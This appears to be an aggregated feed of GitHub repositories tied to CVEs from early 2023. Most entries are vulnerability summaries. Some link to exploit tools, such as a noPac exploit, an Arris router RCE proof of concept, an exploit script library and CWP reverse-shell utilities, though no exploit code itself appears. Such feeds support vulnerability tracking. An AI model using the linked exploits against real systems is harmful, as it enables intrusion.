**Integer overflow in Core in Google Chrome prior to 110.0.5481.77 allowed a remote attacker who had one a race condition to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0705](https://github.com/Live-Hack-CVE/CVE-2023-0705) create time: 2023-02-16T16:06:50Z

**no description** : [0xsu3ks/CVE-2023-0860](https://github.com/0xsu3ks/CVE-2023-0860) create time: 2023-02-16T13:49:20Z

**Write-up for another forgotten Windows vulnerability (0day): Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape, which was not fully fixed as CVE-2022-44666 in the patches released on December, 2022.** : [j00sean/CVE-2022-44666](https://github.com/j00sean/CVE-2022-44666) create time: 2023-02-15T18:12:04Z

**In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, excessive number of parts in HTTP form upload can cause high resource consumption and excessive number of log entries. This can cause denial of service on the affected server by exhausting CPU resources or disk space. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0662](https://github.com/Live-Hack-CVE/CVE-2023-0662) create time: 2023-02-16T11:38:25Z

**In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, core path resolution function allocate buffer one byte too small. When resolving paths with lengths close to system MAXPATHLEN setting, this may lead to the byte after the allocated buffer being overwritten with NUL value, which might lead to unaut CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0568](https://github.com/Live-Hack-CVE/CVE-2023-0568) create time: 2023-02-16T11:38:22Z

**NetModule NSRW web administration interface executes an OS command constructed with unsanitized user input. A successful exploit could allow an authenticated user to execute arbitrary commands with elevated privileges. This issue affects NSRW: from 4.3.0.0 before 4.3.0.119, from 4.4.0.0 before 4.4.0.118, from 4.6.0.0 b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0861](https://github.com/Live-Hack-CVE/CVE-2023-0861) create time: 2023-02-16T11:38:18Z

**The NetModule NSRW web administration interface is vulnerable to path traversals, which could lead to arbitrary file uploads and deletion. By uploading malicious files to the web root directory, authenticated users could gain remote command execution with elevated privileges. This issue affects NSRW: from 4.3.0.0 befor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0862](https://github.com/Live-Hack-CVE/CVE-2023-0862) create time: 2023-02-16T11:38:15Z

**Improper Restriction of Excessive Authentication Attempts in GitHub repository modoboa/modoboa-installer prior to 2.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0860](https://github.com/Live-Hack-CVE/CVE-2023-0860) create time: 2023-02-16T11:38:11Z

**.Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploit noPac** : [ricardojba/Invoke-noPac](https://github.com/ricardojba/Invoke-noPac) create time: 2021-12-13T19:01:18Z

**On BIG-IP 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.1.4, and 12.1.0-12.1.4, undisclosed traffic sent to BIG-IP iSession virtual server may cause the Traffic Management Microkernel (TMM) to restart, resulting in a Denial-of-Service (DoS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6623](https://github.com/Live-Hack-CVE/CVE-2019-6623) create time: 2023-02-16T07:17:18Z

**On BIG-IP 14.1.0-14.1.0.5, undisclosed SSL traffic to a virtual server configured with a Client SSL profile may cause TMM to fail and restart. The Client SSL profile must have session tickets enabled and use DHE cipher suites to be affected. This only impacts the data plane, there is no impact to the control plane. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6629](https://github.com/Live-Hack-CVE/CVE-2019-6629) create time: 2023-02-16T07:17:15Z

**On BIG-IP 11.5.1-11.6.4, iRules performing HTTP header manipulation may cause an interruption to service when processing traffic handled by a Virtual Server with an associated HTTP profile, in specific circumstances, when the requests do not strictly conform to RFCs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6631](https://github.com/Live-Hack-CVE/CVE-2019-6631) create time: 2023-02-16T07:17:11Z

**On BIG-IP 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.1.4, 12.1.0-12.1.4, 11.6.1-11.6.3.4, and 11.5.1-11.5.8, when the BIG-IP system is licensed for Appliance mode, a user with either the Administrator or the Resource Administrator role can bypass Appliance mode restrictions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6635](https://github.com/Live-Hack-CVE/CVE-2019-6635) create time: 2023-02-16T07:17:08Z

**On BIG-IP (AFM, PEM) 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.1.4, 12.1.0-12.1.4, 11.6.1-11.6.3.4, and 11.5.1-11.5.8, an undisclosed TMUI pages for AFM and PEM Subscriber management are vulnerable to a stored cross-site scripting (XSS) issue. This is a control plane issue only and is not accessible from the data p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6639](https://github.com/Live-Hack-CVE/CVE-2019-6639) create time: 2023-02-16T07:17:04Z

**On BIG-IP 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.1.4, 12.1.0-12.1.4.1, and 11.5.1-11.6.4, when the BIG-IP system is licensed with Appliance mode, user accounts with Administrator and Resource Administrator roles can bypass Appliance mode restrictions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6633](https://github.com/Live-Hack-CVE/CVE-2019-6633) create time: 2023-02-16T07:17:00Z

**CVE-2022-40348: Intern Record System - 'name' and 'email' Cross-site Scripting (Unauthenticated)** : [h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated) create time: 2023-02-16T02:29:33Z

**CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)** : [h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated) create time: 2023-02-16T02:16:51Z

**SQL Injection vulnerability in file home\controls\cart.class.php in UQCMS 2.1.3, allows attackers execute arbitrary commands via the cookie_cart parameter to /index.php/cart/num. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21120](https://github.com/Live-Hack-CVE/CVE-2020-21120) create time: 2023-02-15T23:25:07Z

**SQL Injection vulnerability in Kliqqi-CMS 2.0.2 in admin/admin_update_module_widgets.php in recordIDValue parameter, allows attackers to gain escalated privileges and execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21119](https://github.com/Live-Hack-CVE/CVE-2020-21119) create time: 2023-02-15T23:25:03Z

**Cross Site Scripting (XSS) vulnerability in kevinpapst kimai2 1.30.0 in /src/Twig/Runtime/MarkdownExtension.php, allows attackers to gain escalated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19825](https://github.com/Live-Hack-CVE/CVE-2020-19825) create time: 2023-02-15T23:25:00Z

**SQL Injection vulnerability in SEO Panel 4.9.0 in api/user.api.php in function getUserName in the username parameter, allows attackers to gain sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34117](https://github.com/Live-Hack-CVE/CVE-2021-34117) create time: 2023-02-15T23:25:21Z

**SQL Injection vulnerability in nitinparashar30 cms-corephp through commit bdabe52ef282846823bda102728a35506d0ec8f9 (May 19, 2021) allows unauthenticated attackers to gain escilated privledges via a crafted login. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33925](https://github.com/Live-Hack-CVE/CVE-2021-33925) create time: 2023-02-15T23:25:17Z

**Cross Site Request Forgery (CSRF) vulnerability in baijiacms 4.1.4, allows attackers to change the password or other information of an arbitrary account via index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33396](https://github.com/Live-Hack-CVE/CVE-2021-33396) create time: 2023-02-15T23:25:13Z

**Double Free vulnerability in virtualsquare picoTCP v1.7.0 and picoTCP-NG v2.1 in modules/pico_fragments.c in function pico_fragments_reassemble, allows attackers to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33304](https://github.com/Live-Hack-CVE/CVE-2021-33304) create time: 2023-02-15T23:25:10Z

**SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38239](https://github.com/Live-Hack-CVE/CVE-2021-38239) create time: 2023-02-15T23:24:56Z

**CVE-2022-40032: Simple Task Managing System - 'login' and 'password' SQL Injection (Unauthenticated)** : [h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated) create time: 2023-02-16T01:42:48Z

**Information Disclosure in Authentication Component of ScreenCheck BadgeMaker 2.6.2.0 application allows internal attacker to obtain credentials for authentication via network sniffing. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45546](https://github.com/Live-Hack-CVE/CVE-2022-45546) create time: 2023-02-15T23:26:02Z

**ASUS EC Tool driver (aka d.sys) 1beb15c90dcf7a5234ed077833a0a3e900969b60be1d04fcebce0a9f8994bdbb, as signed by ASUS and shipped with multiple ASUS software products, contains multiple IOCTL handlers that provide raw read and write access to port I/O and MSRs via unprivileged IOCTL calls. Local users can gain privileges CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42455](https://github.com/Live-Hack-CVE/CVE-2022-42455) create time: 2023-02-15T23:25:59Z

**Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45543](https://github.com/Live-Hack-CVE/CVE-2022-45543) create time: 2023-02-15T23:25:55Z

**Use After Free (UAF) vulnerability in ireader media-server before commit 3e0f63f1d3553f75c7d4eb32fa7c7a1976a9ff84 in librtmp, allows attackers to cause a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40016](https://github.com/Live-Hack-CVE/CVE-2022-40016) create time: 2023-02-15T23:25:35Z

**An issue was discovered in NiterForum version 2.5.0-beta in /src/main/java/cn/niter/forum/api/SsoApi.java and /src/main/java/cn/niter/forum/controller/AdminController.java, allows attackers to gain escalated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38935](https://github.com/Live-Hack-CVE/CVE-2022-38935) create time: 2023-02-15T23:25:31Z

**SQL Injection vulnerability in Ehoney version 2.0.0 in models/protocol.go and models/images.go, allows attackers to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38868](https://github.com/Live-Hack-CVE/CVE-2022-38868) create time: 2023-02-15T23:25:28Z

**SQL Injection vulnerability in rttys versions 4.0.0, 4.0.1, and 4.0.2 in api.go, allows attackers to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38867](https://github.com/Live-Hack-CVE/CVE-2022-38867) create time: 2023-02-15T23:25:24Z

**Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22855](https://github.com/Live-Hack-CVE/CVE-2023-22855) create time: 2023-02-15T23:26:06Z

**A vulnerability was found in Netgear WNDR3700v2 1.0.1.14 and classified as problematic. This issue affects some unknown processing of the component Web Interface. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0850](https://github.com/Live-Hack-CVE/CVE-2023-0850) create time: 2023-02-15T23:25:47Z

**A vulnerability has been found in Netgear WNDR3700v2 1.0.1.14 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifie CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0849](https://github.com/Live-Hack-CVE/CVE-2023-0849) create time: 2023-02-15T23:25:42Z

**A vulnerability was found in Netgear WNDR3700v2 1.0.1.14. It has been rated as problematic. This issue affects some unknown processing of the component Web Management Interface. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be use CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0848](https://github.com/Live-Hack-CVE/CVE-2023-0848) create time: 2023-02-15T23:25:38Z

**no description** : [BKreisel/CVE-2022-41343](https://github.com/BKreisel/CVE-2022-41343) create time: 2023-02-15T23:17:55Z

**CVE-2023-0669 GoAnywhere MFT command injection vulnerability** : [cataiovita/CVE-2023-0669](https://github.com/cataiovita/CVE-2023-0669) create time: 2023-02-15T23:00:18Z

**Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340** : [kuckibf/Popular-CVEs](https://github.com/kuckibf/Popular-CVEs) create time: 2023-02-15T21:43:32Z

**Customers who had configured their polling to occur via Kerberos did not expect NTLM Traffic on their environment, but since we were querying for data via IP address this prevented us from utilizing Kerberos. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47508](https://github.com/Live-Hack-CVE/CVE-2022-47508) create time: 2023-02-15T22:18:02Z

**SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47504](https://github.com/Live-Hack-CVE/CVE-2022-47504) create time: 2023-02-15T22:17:58Z

**SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38111](https://github.com/Live-Hack-CVE/CVE-2022-38111) create time: 2023-02-15T22:17:54Z

**Libpeconv – integer overflow, before commit 75b1565 (30/11/2022). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23462](https://github.com/Live-Hack-CVE/CVE-2023-23462) create time: 2023-02-15T22:18:13Z

**Libpeconv – access violation, before commit b076013 (30/11/2022). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23461](https://github.com/Live-Hack-CVE/CVE-2023-23461) create time: 2023-02-15T22:18:09Z

**Priority Windows may allow Command Execution via SQL Injection using an unspecified method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23459](https://github.com/Live-Hack-CVE/CVE-2023-23459) create time: 2023-02-15T22:18:06Z

**SolarWinds Platform version 2022.4.1 was found to be susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to the SolarWinds Web Console to execute arbitrary commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23836](https://github.com/Live-Hack-CVE/CVE-2023-23836) create time: 2023-02-15T22:17:50Z

**Inappropriate implementation in Full screen mode in Google Chrome on Android prior to 110.0.5481.77 allowed a remote attacker to spoof the contents of the security UI via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0697](https://github.com/Live-Hack-CVE/CVE-2023-0697) create time: 2023-02-15T22:17:31Z

**Type confusion in V8 in Google Chrome prior to 110.0.5481.77 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0696](https://github.com/Live-Hack-CVE/CVE-2023-0696) create time: 2023-02-15T22:17:27Z

**Out of bounds read in WebRTC in Google Chrome prior to 110.0.5481.77 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0698](https://github.com/Live-Hack-CVE/CVE-2023-0698) create time: 2023-02-15T22:17:23Z

**An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. When it is not caught, it may cause programs using the library to crash or expose sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27568](https://github.com/Live-Hack-CVE/CVE-2021-27568) create time: 2023-02-15T20:06:30Z

**ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44268](https://github.com/Live-Hack-CVE/CVE-2022-44268) create time: 2023-02-15T20:06:45Z

**ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44267](https://github.com/Live-Hack-CVE/CVE-2022-44267) create time: 2023-02-15T20:06:41Z

**In Ampere AltraMax and Ampere Altra before 2.10c, improper access controls allows the OS to reinitialize a disabled root complex. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46892](https://github.com/Live-Hack-CVE/CVE-2022-46892) create time: 2023-02-15T20:06:35Z

**Stack overflow vulnerability in function gmalloc in goo/gmem.cc in xpdf 4.04, allows local attackers to cause a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45587](https://github.com/Live-Hack-CVE/CVE-2022-45587) create time: 2023-02-15T20:05:59Z

**Stack overflow vulnerability in function Dict::find in xpdf/Dict.cc in xpdf 4.04, allows local attackers to cause a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45586](https://github.com/Live-Hack-CVE/CVE-2022-45586) create time: 2023-02-15T20:05:51Z

**LS ELECTRIC XBC-DN32U with operating system version 01.80 does not properly control access to the PLC over its internal XGT protocol. An attacker could control and tamper with the PLC by sending the packets to the PLC over its XGT protocol. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22807](https://github.com/Live-Hack-CVE/CVE-2023-22807) create time: 2023-02-15T20:06:25Z

**LS ELECTRIC XBC-DN32U with operating system version 01.80 transmits sensitive information in cleartext when communicating over its XGT protocol. This could allow an attacker to gain sensitive information such as user credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22806](https://github.com/Live-Hack-CVE/CVE-2023-22806) create time: 2023-02-15T20:06:21Z

**LS ELECTRIC XBC-DN32U with operating system version 01.80 has improper access control to its read prohibition feature. This could allow a remote attacker to remotely set the feature to lock users out of reading data from the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22805](https://github.com/Live-Hack-CVE/CVE-2023-22805) create time: 2023-02-15T20:06:18Z

**LS ELECTRIC XBC-DN32U with operating system version 01.80 is missing authentication to create users on the PLC. This could allow an attacker to create and use an account with elevated privileges and take control of the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22804](https://github.com/Live-Hack-CVE/CVE-2023-22804) create time: 2023-02-15T20:06:14Z

**LS ELECTRIC XBC-DN32U with operating system version 01.80 is missing authentication to perform critical functions to the PLC. This could allow an attacker to change the PLC's mode arbitrarily. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22803](https://github.com/Live-Hack-CVE/CVE-2023-22803) create time: 2023-02-15T20:06:10Z

**A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0361](https://github.com/Live-Hack-CVE/CVE-2023-0361) create time: 2023-02-15T20:06:06Z

**If an attacker were to access memory locations of LS ELECTRIC XBC-DN32U with operating system version 01.80 that are outside of the communication buffer, the device stops operating. This could allow an attacker to cause a denial-of-service condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0103](https://github.com/Live-Hack-CVE/CVE-2023-0103) create time: 2023-02-15T20:06:03Z

**LS ELECTRIC XBC-DN32U with operating system version 01.80 is missing authentication for its deletion command. This could allow an attacker to delete arbitrary files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0102](https://github.com/Live-Hack-CVE/CVE-2023-0102) create time: 2023-02-15T20:05:55Z

**Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) POC Exploit (CVE-2022-45701)** : [yerodin/CVE-2022-45701](https://github.com/yerodin/CVE-2022-45701) create time: 2023-02-15T18:31:32Z

**The Lightweight Accordion WordPress plugin before 1.5.15 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0373](https://github.com/Live-Hack-CVE/CVE-2023-0373) create time: 2023-02-15T17:52:10Z

**The Location Weather WordPress plugin before 1.3.4 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0360](https://github.com/Live-Hack-CVE/CVE-2023-0360) create time: 2023-02-15T17:52:06Z

**The TemplatesNext ToolKit WordPress plugin before 3.2.9 does not validate some of its shortcode attributes before using them to generate an HTML tag, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0333](https://github.com/Live-Hack-CVE/CVE-2023-0333) create time: 2023-02-15T17:52:02Z

**The Easy Accept Payments for PayPal WordPress plugin before 4.9.10 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0275](https://github.com/Live-Hack-CVE/CVE-2023-0275) create time: 2023-02-15T17:51:58Z

**The WP Yelp Review Slider WordPress plugin before 7.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0263](https://github.com/Live-Hack-CVE/CVE-2023-0263) create time: 2023-02-15T17:51:51Z

**Nextcloud mail is an email app for the nextcloud home server platform. In affected versions the SMTP, IMAP and Sieve host fields allowed to scan for internal services and servers reachable from within the local network of the Nextcloud Server. It is recommended that the Nextcloud Maill app is upgraded to 1.15.0 or 2.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23943](https://github.com/Live-Hack-CVE/CVE-2023-23943) create time: 2023-02-15T17:51:47Z

**An issue was discovered in Couchbase Server 7.x before 7.0.5 and 7.1.x before 7.1.2. A crafted HTTP REST request from an administrator account to the Couchbase Server Backup Service can exhaust memory resources, causing the process to be killed, which can be used for denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42950](https://github.com/Live-Hack-CVE/CVE-2022-42950) create time: 2023-02-15T15:40:56Z

**An issue was discovered in Couchbase Server 6.5.x and 6.6.x before 6.6.6, 7.x before 7.0.5, and 7.1.x before 7.1.2. During the start-up of a Couchbase Server node, there is a small window of time (before the cluster management authentication has started) where an attacker can connect to the cluster manager using defaul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42951](https://github.com/Live-Hack-CVE/CVE-2022-42951) create time: 2023-02-15T15:40:52Z

**An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the FvbServicesRuntimeDxe shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32477](https://github.com/Live-Hack-CVE/CVE-2022-32477) create time: 2023-02-15T15:40:11Z

**An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the VariableRuntimeDxe shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This issue was fixed in the kernel, which also protected CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32475](https://github.com/Live-Hack-CVE/CVE-2022-32475) create time: 2023-02-15T15:40:07Z

**An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the PnpSmm shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for the ACPI run CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32469](https://github.com/Live-Hack-CVE/CVE-2022-32469) create time: 2023-02-15T15:40:03Z

**Red Team utilities for setting up CWP CentOS 7 payload & reverse shell, as it refers to CVE-2022-44877** : [hotpotcookie/cwp-rce-white-box](https://github.com/hotpotcookie/cwp-rce-white-box) create time: 2023-02-15T15:22:48Z

**A missing permission check in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers with Overall/Read permission to connect to an attacker-specified web server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25768](https://github.com/Live-Hack-CVE/CVE-2023-25768) create time: 2023-02-15T15:40:45Z

**A cross-site request forgery (CSRF) vulnerability in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers to connect to an attacker-specified web server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25767](https://github.com/Live-Hack-CVE/CVE-2023-25767) create time: 2023-02-15T15:40:42Z

**A missing permission check in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25766](https://github.com/Live-Hack-CVE/CVE-2023-25766) create time: 2023-02-15T15:40:38Z

**In Jenkins Email Extension Plugin 2.93 and earlier, templates defined inside a folder were not subject to Script Security protection, allowing attackers able to define email templates in folders to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25765](https://github.com/Live-Hack-CVE/CVE-2023-25765) create time: 2023-02-15T15:40:34Z

**Jenkins Email Extension Plugin 2.93 and earlier does not escape, sanitize, or sandbox rendered email template output or log output generated during template rendering, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create or change custom email templates. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25764](https://github.com/Live-Hack-CVE/CVE-2023-25764) create time: 2023-02-15T15:40:30Z

**Jenkins Email Extension Plugin 2.93 and earlier does not escape various fields included in bundled email templates, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control affected fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25763](https://github.com/Live-Hack-CVE/CVE-2023-25763) create time: 2023-02-15T15:40:27Z

**Jenkins Pipeline: Build Step Plugin 2.18 and earlier does not escape job names in a JavaScript expression used in the Pipeline Snippet Generator, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control job names. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25762](https://github.com/Live-Hack-CVE/CVE-2023-25762) create time: 2023-02-15T15:40:23Z

**Jenkins JUnit Plugin 1166.va_436e268e972 and earlier does not escape test case class names in JavaScript expressions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control test case class names in the JUnit resources processed by the plugin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25761](https://github.com/Live-Hack-CVE/CVE-2023-25761) create time: 2023-02-15T15:40:19Z

**A vulnerability, which was classified as critical, has been found in GPAC 2.3-DEV-rev40-g3602a5ded. This issue affects the function mp3_dmx_process of the file filters/reframe_mp3.c. The manipulation leads to heap-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0841](https://github.com/Live-Hack-CVE/CVE-2023-0841) create time: 2023-02-15T15:40:15Z

**A vulnerability classified as problematic was found in PHPCrazy 1.1.1. This vulnerability affects unknown code of the file admin/admin.php?action=users&mode=info&user=2. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0840](https://github.com/Live-Hack-CVE/CVE-2023-0840) create time: 2023-02-15T15:39:59Z

**Switcher Client is a JavaScript SDK to work with Switcher API which is cloud-based Feature Flag. Unsanitized input flows into Strategy match operation (EXIST), where it is used to build a regular expression. This may result in a Regular expression Denial of Service attack (reDOS). This issue has been patched in version CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23925](https://github.com/Live-Hack-CVE/CVE-2023-23925) create time: 2023-02-15T15:39:54Z

**no description** : [Turzum/ps-lab-cve-2021-4034](https://github.com/Turzum/ps-lab-cve-2021-4034) create time: 2023-02-15T14:08:23Z

